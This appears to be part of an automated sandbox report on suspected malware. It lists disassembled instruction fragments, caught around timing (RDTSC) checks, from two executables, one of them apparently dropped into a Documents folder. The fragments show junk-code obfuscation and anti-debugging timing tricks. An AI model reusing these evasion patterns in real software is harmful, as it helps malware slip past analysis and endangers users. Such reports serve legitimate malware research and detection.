              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C07B0 second address: 56C07B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C07B4 second address: 56C07FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b dec edi 0x0000000c pushad 0x0000000d movzx eax, di 0x00000010 mov si, di 0x00000013 popad 0x00000014 lea ebx, dword ptr [edi+01h] 0x00000017 jmp 00007F50492D81A3h 0x0000001c mov al, byte ptr [edi+01h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F50492D81A5h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C07FE second address: 56C084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5048C0A333h 0x00000013 sbb esi, 40EB13CEh 0x00000019 jmp 00007F5048C0A339h 0x0000001e popfd 0x0000001f mov di, cx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C084F second address: 56C0897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F50492D819Eh 0x00000010 jne 00007F50B95303A5h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov si, di 0x0000001c call 00007F50492D81A9h 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0897 second address: 56C089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C089D second address: 56C08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C08A1 second address: 56C08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C08A5 second address: 56C0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F50492D81A2h 0x00000011 jmp 00007F50492D81A5h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F50492D81A0h 0x0000001d adc eax, 45B7DE98h 0x00000023 jmp 00007F50492D819Bh 0x00000028 popfd 0x00000029 popad 0x0000002a shr ecx, 02h 0x0000002d pushad 0x0000002e mov dl, ch 0x00000030 pushfd 0x00000031 jmp 00007F50492D81A1h 0x00000036 xor ah, 00000036h 0x00000039 jmp 00007F50492D81A1h 0x0000003e popfd 0x0000003f popad 0x00000040 rep movsd 0x00000042 rep movsd 0x00000044 rep movsd 0x00000046 rep movsd 0x00000048 rep movsd 0x0000004a jmp 00007F50492D819Eh 0x0000004f mov ecx, edx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F50492D81A3h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0953 second address: 56C0977 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and ecx, 03h 0x0000000a jmp 00007F5048C0A332h 0x0000000f rep movsb 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0977 second address: 56C097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C097B second address: 56C097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C097F second address: 56C0985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0985 second address: 56C098B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C098B second address: 56C098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C098F second address: 56C09A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, ED3Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C09A7 second address: 56C09AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C09AC second address: 56C09BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5048C0A32Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C09BD second address: 56C09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F50492D81A8h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C09F2 second address: 56C0A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0A01 second address: 56C0A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0A07 second address: 56C0A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0A0B second address: 56C0A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F50492D819Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0A22 second address: 56C0A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0A28 second address: 56C0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], ecx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F50492D819Fh 0x00000016 xor ecx, 795D11AEh 0x0000001c jmp 00007F50492D81A9h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F50492D81A0h 0x00000028 xor cl, 00000028h 0x0000002b jmp 00007F50492D819Bh 0x00000030 popfd 0x00000031 popad 0x00000032 pop ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F50492D81A5h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0AA1 second address: 56C0AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0AA7 second address: 56C0AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F50492D819Fh 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007F50492D81A4h 0x00000015 mov si, A971h 0x00000019 popad 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F50492D81A9h 0x00000023 mov di, si 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0AFB second address: 56C0B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5048C0A338h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0B17 second address: 56C0B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F50492D81A3h 0x00000012 sbb ax, 329Eh 0x00000017 jmp 00007F50492D81A9h 0x0000001c popfd 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0C36 second address: 56C0C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5048C0A334h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0C4E second address: 56C0C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0C52 second address: 56C0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5048C0A32Ah 0x00000012 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: EEF25E second address: EEEB98 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F50492D8198h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jbe 00007F50492D819Eh 0x00000013 pushad 0x00000014 mov ebx, 46E86DC2h 0x00000019 stc 0x0000001a popad 0x0000001b push dword ptr [ebp+122D06E5h] 0x00000021 ja 00007F50492D81A3h 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D1792h], ebx 0x0000002e mov edi, 75900021h 0x00000033 popad 0x00000034 call dword ptr [ebp+122D2227h] 0x0000003a pushad 0x0000003b mov dword ptr [ebp+122D21D7h], edx 0x00000041 xor eax, eax 0x00000043 mov dword ptr [ebp+122D212Dh], edi 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d cld 0x0000004e mov dword ptr [ebp+122D3A59h], eax 0x00000054 sub dword ptr [ebp+122D212Dh], edx 0x0000005a mov esi, 0000003Ch 0x0000005f sub dword ptr [ebp+122D221Fh], eax 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 mov dword ptr [ebp+122D212Dh], ecx 0x0000006f lodsw 0x00000071 pushad 0x00000072 jg 00007F50492D819Ch 0x00000078 mov bx, 8B00h 0x0000007c popad 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 jmp 00007F50492D81A6h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f jmp 00007F50492D81A6h 0x00000094 push eax 0x00000095 push edx 0x00000096 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: EEEB98 second address: EEEB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1065DFA second address: 1065DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1065DFE second address: 1065E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1065E02 second address: 1065E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106DB18 second address: 106DB23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106DE1E second address: 106DE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D81A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F50492D8196h 0x00000011 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106DE40 second address: 106DE44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106E10C second address: 106E110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106E110 second address: 106E116 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106E116 second address: 106E129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F50492D819Ah 0x0000000f rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106E129 second address: 106E12E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 106E2D5 second address: 106E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1070BB1 second address: 1070BB6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1070CD0 second address: 1070CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1070CD4 second address: 1070CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1070DC3 second address: 1070E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F50492D8198h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 or cl, 00000057h 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 clc 0x0000002a jmp 00007F50492D819Ch 0x0000002f popad 0x00000030 call 00007F50492D8199h 0x00000035 push edx 0x00000036 pushad 0x00000037 push edi 0x00000038 pop edi 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c pop edx 0x0000003d push eax 0x0000003e je 00007F50492D819Ah 0x00000044 push ebx 0x00000045 pushad 0x00000046 popad 0x00000047 pop ebx 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 pop eax 0x00000051 js 00007F50492D8196h 0x00000057 popad 0x00000058 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1070E30 second address: 1070E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5048C0A32Ch 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091046 second address: 109104C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109104C second address: 1091050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091050 second address: 1091059 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10911B7 second address: 10911BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10911BD second address: 10911C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091989 second address: 1091994 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091AFB second address: 1091B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091B08 second address: 1091B22 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5048C0A32Eh 0x00000011 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091C70 second address: 1091C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D81A6h 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091C8A second address: 1091C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091C8E second address: 1091C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091DF3 second address: 1091DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1091DF7 second address: 1091E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F50492D8198h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jnp 00007F50492D81A0h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1092C22 second address: 1092C2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1092C2C second address: 1092C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1098544 second address: 1098554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F5048C0A32Bh 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1098554 second address: 109857A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F50492D81A3h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F50492D8196h 0x00000018 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109857A second address: 109857E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109857E second address: 1098588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1098588 second address: 109859A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5048C0A32Eh 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109859A second address: 109859E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109A49C second address: 109A4B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109A4B7 second address: 109A4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F50492D819Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109AAA5 second address: 109AAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109AAAA second address: 109AAF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F50492D819Dh 0x00000010 pop edx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push esi 0x00000016 jmp 00007F50492D819Bh 0x0000001b pop esi 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F50492D819Eh 0x00000025 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1099B35 second address: 1099B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F651 second address: 109F655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F655 second address: 109F659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F659 second address: 109F65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F65F second address: 109F665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F665 second address: 109F683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F50492D81A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F683 second address: 109F690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5048C0A326h 0x0000000d rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 105F27E second address: 105F2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F50492D8196h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007F50492D81A7h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F50492D819Ah 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 105F2AF second address: 105F2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 105F2B5 second address: 105F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
